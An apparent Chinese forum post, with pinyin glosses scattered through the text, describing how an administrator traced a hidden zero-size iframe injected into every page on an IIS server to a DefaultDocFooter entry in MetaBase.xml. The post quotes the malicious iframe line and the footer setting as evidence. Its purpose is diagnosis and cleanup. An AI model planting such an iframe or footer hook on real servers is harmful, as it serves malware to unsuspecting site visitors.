一台服務器 幾乎所（suǒ）有網站（zhàn）打開網頁 甚至（zhì）HTML網頁 都出現（xiàn）了

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

這種樣式的代碼 有的在頭部（bù）　有（yǒu）的在尾部（bù） 部分殺毒軟件打開會報毒

打開（kāi）HTML或ASP PHP頁麵 在源（yuán）碼中怎麽也找不到這段代（dài）碼

分析原因

首先懷疑（yí）ARP掛馬，用防ARP的工（gōng）具又沒（méi）有發現有arp欺（qī）騙（piàn）

而（ér）且arp欺騙一般不會（huì）每（měi）次都（dōu）被插入（rù）代碼，而是時有時無

而（ér）且使用http://127.0.0.1 或者http://localhost 訪問的時候也可以找到這段（duàn）代碼

arp欺騙的可能排除。

然（rán）後就（jiù）想到可能是JS被篡改，或（huò）者是其它的包含文件，查（chá）找後沒有發現被改的頁麵 連新建的HTML頁麵瀏覽的時（shí）候也會被插入（rù）這段代碼，那就隻能（néng）是通過ＩＩＳ掛上（shàng）去（qù）的了。

備份iis數據然後重裝iis，代碼消失（shī），將備份（fèn）的iis恢複，問題又來了（le）。

仔細尋找，問題應該出在（zài）IIS的（de）配置文件上（shàng），打（dǎ）開配置文件，沒有發現那段代碼。

那很有可能是（shì）調（diào）用了某個文件，這個怎麽查啊，忽然想起了大（dà）名鼎鼎的Filemon

本地（dì）載（zǎi）了一（yī）個（gè）上傳到服務器上，打（dǎ）開Filemon，數據太多（duō）了，過濾（lǜ）掉一些沒有用的（de）

隻留下iis的進程，數據（jù）還是很多，看（kàn）來服（fú）務器上（shàng）的站點（diǎn）還是挺多人在訪問的。

關掉所（suǒ）有站點,建了一個測（cè）試站點anky 目錄（lù）為（wéi）D:\www\　在下麵建了一個空（kōng）白頁麵test.htm

訪問一下（xià）這（zhè）個（gè）頁麵代（dài）碼被插（chā）進（jìn）來了，再看一下（xià）Filemon　奇（qí）怪怎麽讀取C:\Inetpub\wwwroot\iisstart.htm

打（dǎ）開C:\Inetpub\wwwroot\iisstart.htm一看（kàn），裏麵就躺著（zhe）

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

把（bǎ）代碼（mǎ）刪除了留空，訪（fǎng）問test.htm 正常（cháng）了，把C:\Inetpub\wwwroot\iisstart.htm刪除（chú）了（le）再訪問

test.htm　出現　“讀取（qǔ）數據（jù）頁（yè）腳文件出（chū）錯（cuò）”問題（tí）就出（chū）這（zhè）裏了，看來是調用了

這個文件。

把C:\Inetpub\wwwroot\iisstart.htm清空就正（zhèng）常（cháng）了（le），這樣怎麽（me）行（háng），解決問題當（dāng）然要連根（gēn）拔掉。

continue

有沒有可能是擴展造（zào）成的，到擴展中檢查了一遍全部都是正（zhèng）常（cháng）的

當然 通過ISAPI 掛馬（mǎ）的也是存在的

左想（xiǎng）右想最後還是覺得配置文（wén）件有問題

打（dǎ）開（kāi）配置文件，配（pèi）置文件（jiàn）在%windir%\system32\inetsrv\MetaBase.xml

用記事（shì）本打開，查找iisstart.htm　找到（dào）一行，開始以為是默認站點，後來一想不對啊（ā）

默（mò）認站點都刪除了，再仔細一看這句代碼為

DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm"

刪（shān）除（chú）掉（diào）這一（yī）行（háng），問題徹底解決了。